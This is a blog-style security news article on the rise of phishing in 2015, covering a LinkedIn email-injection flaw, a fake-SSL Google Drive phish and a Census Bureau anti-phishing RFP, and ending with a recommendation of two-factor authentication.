According to a new report, the Infoblox DNS Threat Index (PDF), phishing is growing in a big way, increasing 74 percent in the second quarter of 2015. The numbers are based on the increase in domain creation and otherwise setting up infrastructure to stage phishing attacks.
As Tripwire.com stated, it’s much easier to rely on social engineering and exploiting weaknesses in the human psyche rather than undermining hardened security systems. That truth is what leads attackers to study social networking profiles and any information online that could lend them credibility during a phishing scam, whether via emails or phone calls.
Phishing Social Media via Emails
LinkedIn, the social networking site notorious for its deluge of daily emails, recently patched a major security issue that would have allowed attackers to execute phishing campaigns via email. By injecting a malicious comment on a user’s post thread, the user will receive a notification sent to their email account, Kaspersky found.
Or, they could just inject code to display a form and collect information entered by the victim, as seen in the screenshot from Kaspersky below:
They could also redirect victims via a link to a spoofed website that serves up malware to the user.
This is particularly worrisome for a social networking website based off of business relationships and the trust between colleagues and others seeking job opportunities. It’s also disturbing the amount of time it took for the site to fix the problem, as they were notified in November and just recently fixed their site.
Kaspersky recommends being cautious of opening any links in emails, and warns against registering on social media networks with your corporate email account.
Faking Trusted SSL Encryption for a Phish
Yet another recent phishing campaign involves attackers that have figured out how to fake Google’s trusted SSL encryption in order to send what appears to be a legitimate Gmail message redirecting users to a spoofed Google Drive page in attempt to steal their username and password.
Researchers from Elastica, a cloud-access security company, found that after submitting information into the HTML page, they were redirected to a PDF document, instead of a page hosted on the Google server.
The attack is considered impressive as the attackers have even replicated the browser lock and https domain URL, standard trademarks of SSL encrypted pages, according to the International Business Times. And that’s pretty alarming, as many users have been trained to look for those indicators in order to trust the site before entering their credentials.
One guy on Twitter supports the use of multi-factor authentication to protect against password theft:
The password is dead. Long live multi factor auth! http://t.co/qILRyKPgwa— Tom Blauvelt (@TomBlue01) July 30, 2015
Phishing After a Breach
The U.S. Census Bureau is also concerned about phishing, after an attacker compromised a database containing names, addresses, phone numbers, site usernames and more.
In response, the Census Bureau is now seeking contractors that provide phishing awareness training and services to protect their information systems and data from potential attacks. Their RFP lists certain requirements, including:
- Provide customer support in the design of phishing campaigns
- Provide the ability to develop customized phishing campaigns
- Provide customizable awareness training
- Provide the ability to track user response and training effectiveness
- Provide coverage for a maximum of 50,000 users
- Provide support to develop agency-specific anti-phishing messages
Prevention + Phishing Awareness = Win
Phishing awareness is key for any organization, but knowledge is more powerful when paired with prevention. One way to secure against phishing attacks is by deploying two-factor authentication for all of your users’ logins to web-based and other company applications.
Even if a phishing attack successfully steals a user’s credentials, the attacker can’t get access to your systems without physical possession of the user’s personal authentication device. For example, an authentication mobile app can push an authentication request to your phone. Without your phone, an attacker can’t approve the request and log in.